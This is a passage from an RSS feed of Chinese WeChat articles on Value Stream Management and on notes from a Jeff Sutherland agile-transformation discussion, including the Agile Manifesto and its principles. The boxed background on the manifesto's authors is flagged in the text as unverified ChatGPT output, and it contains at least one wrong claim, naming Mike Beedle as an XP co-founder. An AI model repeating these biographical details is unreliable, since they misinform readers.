models.</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;" lang="en-US">===cgb</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">组织协调是确保组织内所有个人、团队和部门共同协作，朝着相同的目标和目的前进的过程。其核心是创建共同理解组织的目的、价值和优先事项的文化，并授权每个人为其成功做出贡献。</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">关于组织协调的一个常见误解是，它完全是由高级领导推动的自上而下的倡议。另一个误解是，可以通过表面的措施如口号、海报或演示文稿来实现组织协调。</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"><span style="color:black;">为了避免这些误解，需要认识到实现组织协调需要组织内所有层次的积极参与。这涉及到创建一种信任、透明度和开放沟通的文化，</span><span style="color:#FA0000;">让员工感到有权力贡献他们的想法和反馈</span><span style="color:black;">。</span><span style="color:#FA0000;">领导者也必须设定清晰的期望</span><span style="color:black;">、提供指导和支持，并协调组织的各个方面，如战略、结构、文化、流程和人员。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"><span style="color:black;">为了实现组织协调，重要的是要让组织内所有层次的员工参与进来，倾听他们的意见和反馈，将他们的想法纳入决策中，并提供持续的沟通和反馈。这创造了一种</span><span style="color:#FA0000;">拥有感、参与感和承诺感</span><span style="color:black;">，这对于长期的成功是必不可少的。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;" lang="en-US">---</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;" lang="en-US"><br/></p><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
Calibri;" lang="en-US">VSM</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">为什么也会导致竖井？</span></h2><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"><span style="color:black;">VSM（价值流管理）可能会在不同的解决方案中实施，因为组织内的不同团队或部门可能</span><span style="color:#FA0000;">具有管理其价值流的不同工具和技术</span><span style="color:black;">。这可能导致组织不协调，并使在整个组织范围内有效实施VSM变得困难。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"><span style="color:black;">此外，一些公司可能通过</span><span style="color:#FA0000;">分步骤方法采用了VSM</span><span style="color:black;">，其中不同的团队或部门独立采用了自己的VSM解决方案，而没有考虑如何将其纳入组织的整体战略和目标。这也可能导致组织不协调。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"><span style="color:black;">为解决这些挑战，报告中的参与者表达了对一个适应公司独特产品、组织过程和行业要求的</span><span style="color:#FA0000;">单一VSM解决方案</span><span style="color:black;">的渴望。这将有助于在整个组织中创建更大的一致性和协调，并使VSM原则的实施更加有效。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">总的来说，该报告指出，尽管VSM在增加透明度、业务协调和加速解决方案速度等方面提供了价值，但在实现更高的组织协调和VSM实施标准化方面仍有改进的空间。</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;" lang="en-US">===cge</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;" lang="en-US"><br/></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;" lang="en-US"><br/></p><h1 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:16.0pt;color:#14324D;">客户价值的实话</h1><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;">直接解决问题、关注直接反馈、让客户幸福</h2><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"><span style="color:black;">2023年，提高客户价值的目标排名第一，这比去年排名第三有所上升。接受采访的人表示，尽管他们的流程和供应链在过去几年中受到了干扰，不得不关注内部问题，但他们也认识到他们的客户也遭受了痛苦。高管们分享了产品和服务方面的差劣客户体验，这促使那些客户考虑其他竞争对手，并导致整体品牌忠诚度下降。</span><span style="color:#FA0000;">直接交付价值密就是提高产品价值</span><span style="color:black;">（55%）。</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 12pt;color: rgb(100, 43, 145);"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">【思】直接解决客户问题，而不是去聚焦于内部解决方案，并推送给客户。要特别关注直接的客户反馈（</span><span style="font-family:Calibri;" lang="en-US">direct customer feedback</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">）</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;"><span lang="zh-CN">While we scrambled to stay in business and deliver products, the
reality is, they<span style="mso-spacerun:yes;"> </span></span><span lang="en-US"><span style="mso-spacerun:yes;"> </span>we</span><span lang="zh-CN">re</span><span lang="en-US"> </span><span lang="zh-CN">of lower quality and our customers noticed.
In fact, it’s all over social media now </span><span lang="en-US"><span style="mso-spacerun:yes;"> </span></span><span lang="zh-CN">hat consumers are
unhappy, and they are electing to try different options (competitors).</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">–
Sr. VP, Manufacturing Company</p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;"><br/></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;"><br/></p><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
Calibri;" lang="en-US">VSM</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">的新手和专业玩家</span></h2><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;"><span style="color:black;">在高管讨论中，VSM成熟度的一个关键方面变得明显：较新的VSM采用者正在跟踪销售、解决方案使用、维护合同等指标，这些是公司关心的事情，但</span><span style="color:#FA0000;">更成熟的组织则跟踪客户幸福指标，如支持电话、社交媒体、OKR和KPI，以了解客户的幸福感以及客户如何感知所提供的价值</span><span style="color:black;">。我们都知道，快乐的客户会建立强大的品牌并购买更多产品。</span></p></td></tr></tbody></table><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483722">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=e8017bd7&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247483722%26idx%3D1%26sn%3Dfdf2c69bf65c042c298f19fece9f9a0c%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 12 Apr 2023 17:22:00 +0800</pubDate>
    </item>
    <item>
      <title>企业敏捷转型（20220609对话Jeff Sutherland笔记）</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483716&amp;idx=1&amp;sn=7bbc7a326caad21285ac8397bad65dd5</link>
      <description>Jeff Sutherland和国内敏捷专家一起谈论了敏捷转型。笔记约1万5千字。</description>
      <content:encoded><![CDATA[<p>
<span>伊卡洛斯</span> <span>2023-04-11 18:52</span> <span style="display: inline-block;">上海</span>
</p>

<p>Jeff Sutherland和国内敏捷专家一起谈论了敏捷转型。笔记约1万5千字。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=2ab6f2e1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FFStUibflSINzTqZKgnKiact2CqnzHYQYb8dTPglMbZhu1wC5F0ibnnPfzkMjYWCxgrqR15bGD0QUqqYyHrs3en22A%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><br/></p><p><span style="color: rgb(20, 50, 77);font-family: 微软雅黑;font-size: 16pt;">引子</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;">世界变得越来越复杂，需要敏捷进行更快速的反应。</p><p style="margin: 0in;white-space: normal;font-family: 微软雅黑;font-size: 16pt;color: rgb(20, 50, 77);"><span style="font-size: 16pt;">金句摘抄</span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">敏捷宣言是个有历史意义的文件，是大变革的宣言，是广泛使用的产品，不是软件，不会有新版了。现阶段最主要的问题是如何实施敏捷。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:Calibri;font-size:11.0pt;" lang="zh-CN">Ron Jeffries</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">说，敏捷宣言的第二条，有关价值那条，最重要，我们真心如此（</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="en-US">we
     really mean it</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">）：每个迭代结束，都是向最终用户交付价值。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">S</span><span style="font-family:Calibri;font-size:11.0pt;" lang="zh-CN">crum</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">的本质（</span><span style="font-family:Calibri;font-size:11.0pt;" lang="zh-CN">the thing about
     scrum is to</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">…</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:
     11.0pt;" lang="zh-CN">）是让任何东西都可见！所有人都知道发生了什么、人都在哪里。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:Calibri;font-size:11.0pt;" lang="zh-CN">Scrum</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">可能始于软件开发，但它绝不是只能与软件开发挂钩。事实上，</span><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">S</span><span style="font-family:Calibri;font-size:11.0pt;" lang="zh-CN">crum</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">最重要和最有影响力的实施讲发生在软件之外。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">告诉队员目标，而不是命令他们要做什么，这是对传统管理风格转变的最大挑战。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">在敏捷组织中，我们希望牛人升官后，他们的技能还能继续发挥价值，不能让他没有时间做他擅长的东西了。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">不要被惯例、老传统、老想法封印住了。（要有教练技能，去催化变革）</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">时代一直在变，硬件、软件互为师徒，完成轮换，现在是硬件的思维模式</span><span style="font-family:Calibri;font-size:11.0pt;">mindeset</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">需要改变，硬件就是软件！</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:Calibri;font-size:11.0pt;">scrum at scale</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">，启动时要小，结果清晰，慢慢扩张</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">只有高层有正确的敏捷思维模式，敏捷才能持续下来，这需要十几年的时间（如微软）。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">长期主义，持续的，环环相扣，长期思维，慢慢往那个方向靠。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">中国管理团队参加Jeff的敏捷培训后，这些经理们讨论要创造自己的敏捷方法论，以便（提升敏捷的同时）继续微观管理和控制员工   （从Jeff的无可奈何的笑声中，国人应该了解这是多么犀利的批评、辛辣的讽刺、直击灵魂）。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">中国最大的挑战，领导层是否有开放的态度，拥抱敏捷，绩效才能爆发。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">让大家一起协作工作的能力，能让你的职业生涯无止境。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">敏捷和</span><span style="font-family:Calibri;font-size:11.0pt;">scrum</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">是福音，传教士的心态和精神，要多喊一喊。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">利新易，破旧难，模块化先。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;">转型是组织变革、焦虑的同时心怀远方。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">Scrum的创立受到了Rodney
     Brooks教授的iRobot自主机器人的启发，iRobot机器人使用反馈循环不断评估和响应其周围环境的方式，与预编程、命令与控制的思路绝然相反，iRobot的方法与</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="en-US">Jeff</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;" lang="zh-CN">关于迭代式开发、频繁测试和持续改进的思想相吻合。</span><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"></span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><br/></p><p style="margin: 0in;white-space: normal;font-family: 微软雅黑;font-size: 16pt;color: rgb(20, 50, 77);"><span style="font-size: 16pt;">目录</span></p><p style="margin-bottom: 0px;white-space: normal;">- 引子</p><p style="margin-bottom: 0px;white-space: normal;">- 金句摘抄 </p><p style="margin-bottom: 0px;white-space: normal;">- 暖场开胃菜</p><p style="margin-bottom: 0px;white-space: normal;">    - 重写敏捷宣言？- </p><p style="margin-bottom: 0px;white-space: normal;">    - 敏捷宣言哪一条可以改？</p><p style="margin-bottom: 0px;white-space: normal;">    - 线上工作后，如何影响scrum？ </p><p style="margin-bottom: 0px;white-space: normal;">    - Scrum master的成长之路</p><p style="margin-bottom: 0px;white-space: normal;">    - 如何估算项目</p><p style="margin-bottom: 0px;white-space: normal;">    - 非软件行业使用scrum在增加么？</p><p style="margin-bottom: 0px;white-space: normal;">- 国内大神们开场 </p><p style="margin-bottom: 0px;white-space: normal;">- 敏捷领导力主题</p><p style="margin-bottom: 0px;white-space: normal;">- 创新的速度是成功的首要因素</p><p style="margin-bottom: 0px;white-space: normal;">- 敏捷之后，管理到领导的巨大转变</p><p style="margin-bottom: 0px;white-space: normal;">- 敏捷要点 </p><p style="margin-bottom: 0px;white-space: normal;">- 改变工作内容</p><p style="margin-bottom: 0px;white-space: normal;">- Spotify的分会模型</p><p style="margin-bottom: 0px;white-space: normal;">- 别让敏捷转型失败 </p><p style="margin-bottom: 0px;white-space: normal;">- 启发敏捷的文学作品</p><p style="margin-bottom: 0px;white-space: normal;">    - 问题：30%的同事不愿意被改变</p><p style="margin-bottom: 0px;white-space: normal;">    - 问题：短期应急和长期战略</p><p style="margin-bottom: 0px;white-space: normal;">    - 问题：当事情出错时，会责怪别人</p><p style="margin-bottom: 0px;white-space: normal;">    - 问题：快速出其不意，保证成功 </p><p style="margin-bottom: 0px;white-space: normal;">- 践行SCRUM价值观 </p><p style="margin-bottom: 0px;white-space: normal;">- 嘉宾和Jeff互动环节</p><p style="margin-bottom: 0px;white-space: normal;">    - Sw &amp; hw在应用精益、vsm的区别</p><p style="margin-bottom: 0px;white-space: normal;">    - 实施大规模敏捷的挑战</p><p style="margin-bottom: 0px;white-space: normal;">    - 中国本地化实施SCRUM的挑战</p><p style="margin-bottom: 0px;white-space: normal;">    - 竖井如何改成敏捷、跨职能团队</p><p style="margin-bottom: 0px;white-space: normal;">    - 敏捷教练，内部培养教练，进行转型</p><p style="margin-bottom: 0px;white-space: normal;">    - scrum应用，敏捷企业</p><p style="margin-bottom: 0px;white-space: normal;">- 嘉宾分享感受</p><p style="margin-bottom: 0px;white-space: normal;">- 完整笔记链接</p><p style="margin-bottom: 0px;white-space: normal;"><br/></p><table cellpadding="0" cellspacing="0" valign="top" title="" summary=""><tbody><tr><td style="border-style: solid;border-color: rgb(163, 163, 163);border-width: 1pt;background-color: rgb(231, 231, 231);vertical-align: top;padding: 4pt;word-break: break-all;" width="626.3333333333334"><p style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span style="font-size: 12px;">*方框内容为chatGPT提供的辅助背景信息，<span style="font-size: 12px;color: rgb(255, 0, 0);">是未经验证的信息</span></span></p></td></tr></tbody></table><h1 style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:16.0pt;color:#14324D;">暖场开胃菜</h1><p><span style="font-size: 12px;">*可能为2020左右的视频，也挺经典的，惜未找到完整回放</span><br/></p><h2 style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:14.0pt;color:#276296;">如果今天写敏捷宣言，你希望让那些人来写？</h2><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><span lang="zh-CN">敏捷宣言的所有人，大部分人至今都是</span><span lang="en-US">leading thinkers</span><span lang="zh-CN">，牛人，当时在屋子里面写的</span><span lang="en-US">8</span><span lang="zh-CN">个人都非常关键。</span></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;">如果今天要写敏捷宣言，要加什么新人呢？你们知道得比我更清楚。但是，今天的主要问题是如何实施敏捷！</p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:Calibri;" lang="en-US">30</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="en-US">%</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">的</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="en-US">scrum</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">团队、</span><span style="font-family:Calibri;" lang="en-US">50</span><span style="font-family:微软雅黑;" lang="yo">%的敏捷</span><span style="font-family:微软雅黑;" lang="zh-CN">转型项目没有成功，都是实施的问题。今天更需要有敏捷实战经验人才，市面上有很多敏捷方法，很多不管用。</span></p><table cellpadding="0" cellspacing="0" valign="top" title="" summary=""><tbody><tr><td style="border-style: solid;border-color: rgb(163, 163, 163);border-width: 1pt;background-color: rgb(231, 231, 231);vertical-align: top;padding: 4pt;word-break: break-all;" width="644.3333333333334"><p style="margin:0in;font-size:11.0pt;"><span style="font-size: 12px;"><span style="font-family: &#34;Microsoft YaHei&#34;;">敏捷宣言（</span><span style="font-family: Calibri;">Agile Manifesto</span><span style="font-family: &#34;Microsoft YaHei&#34;;">）的原文如下：</span></span></p><p style="margin:0in;font-family:Calibri;font-size:11.0pt;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-family:Calibri;font-size:11.0pt;"><span style="font-size: 12px;">We are uncovering
  better ways of developing software by doing it and helping others do it.
  Through this work we have come to value:</span></p><p style="margin:0in;font-family:Calibri;font-size:11.0pt;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-family:Calibri;font-size:11.0pt;"><span style="font-size: 12px;">Individuals and
  interactions over processes and tools</span></p><p style="margin:0in;font-family:Calibri;font-size:11.0pt;"><span style="font-size: 12px;">Working software
  over comprehensive documentation</span></p><p style="margin:0in;font-family:Calibri;font-size:11.0pt;"><span style="font-size: 12px;">Customer
  collaboration over contract negotiation</span></p><p style="margin:0in;font-family:Calibri;font-size:11.0pt;"><span style="font-size: 12px;">Responding to
  change over following a plan</span></p><p style="margin:0in;font-family:Calibri;font-size:11.0pt;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-family:Calibri;font-size:11.0pt;"><span style="font-size: 12px;">That is, while
  there is value in the items on the right, we value the items on the left
  more.</span></p><p style="margin:0in;font-family:Calibri;font-size:11.0pt;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span style="font-size: 12px;">译文如下：</span></p><p style="margin:0in;font-family:Calibri;font-size:11.0pt;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span style="font-size: 12px;">我们正在通过实践和帮助他人实践，探索开发软件的更好方式。在这个过程中，我们珍视以下价值：</span></p><p style="margin:0in;font-family:Calibri;font-size:11.0pt;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span style="font-size: 12px;">个体和交互 胜过
  流程和工具</span></p><p style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span style="font-size: 12px;">可工作的软件
  胜过 详尽的文档</span></p><p style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span style="font-size: 12px;">客户合作 胜过
  合同谈判</span></p><p style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span style="font-size: 12px;">响应变化 胜过
  遵循计划</span></p><p style="margin:0in;font-family:Calibri;font-size:11.0pt;"><span style="font-size: 12px;"> </span></p><p style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span style="font-size: 12px;">也就是说，虽然右侧的条目也有其价值，但我们更珍视左侧的价值。</span></p></td></tr></tbody></table><table cellpadding="0" cellspacing="0" valign="top" title="" summary=""><tbody><tr><td style="border-style: solid;border-color: rgb(163, 163, 163);border-width: 1pt;background-color: rgb(231, 231, 231);vertical-align: top;padding: 4pt;word-break: break-all;" width="652.3333333333334"><ul style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:
   0in;" class="list-paddingleft-1"><p style="margin:0in;font-size:11.0pt;"><span style="font-size: 12px;"><span style="font-family: &#34;Microsoft YaHei&#34;;" lang="zh-CN">敏捷宣言的</span><span style="font-family: Calibri;" lang="en-US">12</span><span style="font-family: &#34;Microsoft YaHei&#34;;" lang="zh-CN">原则</span></span></p><ol type="1" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:10.0pt;font-weight:
    normal;font-style:normal;" class="list-paddingleft-1"><li style="vertical-align: middle;margin-top: 12pt;margin-bottom: 12pt;font-size: 12px;"><p><span style="font-weight: normal;font-style: normal;font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Our highest priority is to satisfy the customer
   through early and continuous delivery of valuable software.
        我们的最高优先级是通过及早、持续地交付有价值的软件来满足客户需求。</span></p></li></ol><ol type="1" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;font-weight:
    normal;font-style:normal;" class="list-paddingleft-1"><li style="vertical-align: middle;margin-top: 12pt;margin-bottom: 12pt;font-size: 12px;"><p><span style="font-weight: normal;font-style: normal;font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Welcome changing requirements, even late in
   development. Agile processes harness change for the customer&#39;s competitive advantage. 欢迎变化的需求，即使在开发后期。敏捷过程利用变化为客户创造竞争优势。</span></p></li><li style="vertical-align: middle;margin-top: 12pt;margin-bottom: 12pt;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Deliver working software frequently, with a     preference to the shorter timescale. 频繁地交付可工作的软件，尤其倾向于更短的时间表。</span></p></li><li style="vertical-align: middle;margin-top: 12pt;margin-bottom: 12pt;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Business people and developers must work together     daily throughout the project. 商业人员和开发人员必须在整个项目中每天一起工作。</span></p></li><li style="vertical-align: middle;margin-top: 12pt;margin-bottom: 12pt;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Build projects around motivated individuals. Give
  them the environment and support they need, and trust them to get the       job done. 以有动力的个人为中心建立项目。提供他们所需的环境和支持，并信任他们完成工作。</span></p></li><li style="vertical-align: middle;margin-top: 12pt;margin-bottom: 12pt;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">The most efficient and effective method of conveying    information to and within a development team is face-to-face
  conversation. 向开发团队传达信息的最有效方法是面对面的交流。</span></p></li><li style="vertical-align: middle;margin-top: 12pt;margin-bottom: 12pt;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Working software is the primary measure of progress.
        可工作的软件是进展的主要衡量标准。</span></p></li><li style="vertical-align: middle;margin-top: 12pt;margin-bottom: 12pt;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Agile processes promote sustainable development. The     sponsors, developers, and users should be able to maintain a constant     pace indefinitely. 敏捷过程促进可持续发展。赞助商、开发人员和用户应该能够无限期地保持一个恒定的步伐。</span></p></li><li style="vertical-align: middle;margin-top: 12pt;margin-bottom: 12pt;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Continuous attention to technical excellence and good
  design enhances agility. 持续关注技术卓越和良好的设计有助于提高敏捷性。</span></p></li><li style="vertical-align: middle;margin-top: 12pt;margin-bottom: 12pt;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Simplicity – the art of maximizing the amount of work     not done – is essential. 简洁 - 最大化未完成工作量的艺术 - 是必要的。</span></p></li><li style="vertical-align: middle;margin-top: 12pt;margin-bottom: 12pt;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">The best architectures, requirements, and designs
emerge from self-organizing teams. 最好的架构、需求和设计来自于自组织团队的努力。</span></p></li><li style="vertical-align: middle;margin-top: 12pt;margin-bottom: 12pt;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">At regular intervals, the team reflects on how to    become more effective, then tunes and adjusts its behavior accordingly.
        团队定期反思如何变得更有效，并相应地调整行为。</span></p></li></ol></ul></td></tr></tbody></table><p><br/></p><table cellpadding="0" cellspacing="0" valign="top" title="" summary=""><tbody><tr><td style="border-style: solid;border-color: rgb(163, 163, 163);border-width: 1pt;background-color: rgb(231, 231, 231);vertical-align: top;padding: 4pt;word-break: break-all;" width="652.3333333333334"><ul style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:
   0in;" class="list-paddingleft-1"><p style="margin:0in;font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span style="font-size: 12px;">敏捷宣言作者</span></p><ol type="1" style="direction:ltr;unicode-bidi:embed;margin-top:0in;margin-bottom:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;font-weight:
    normal;font-style:normal;" class="list-paddingleft-1"><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-size: 12px;"><p><span style="font-weight: normal;font-style: normal;font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Kent
        Beck: 美国软件工程师，Extreme Programming (XP)和Test Driven Development
        (TDD)的创始人。</span></p></li><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Mike Beedle:
        秘鲁计算机科学家和企业家，敏捷开发先驱之一，是eXtreme Programming（XP）的创始人之一，于2018年去世。</span></p></li><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Arie van
        Bennekum: 荷兰软件专家和顾问，热衷于敏捷开发和Scrum方法。</span></p></li><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Alistair
        Cockburn: 英国计算机科学家和作家，提出了适应性软件开发的概念，也是Crystal方法的创始人。</span></p></li><li style="margin-top: 0px;margin-bottom: 0px;vertical-align: middle;font-size: 12px;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12px;">Ward Cunningham:
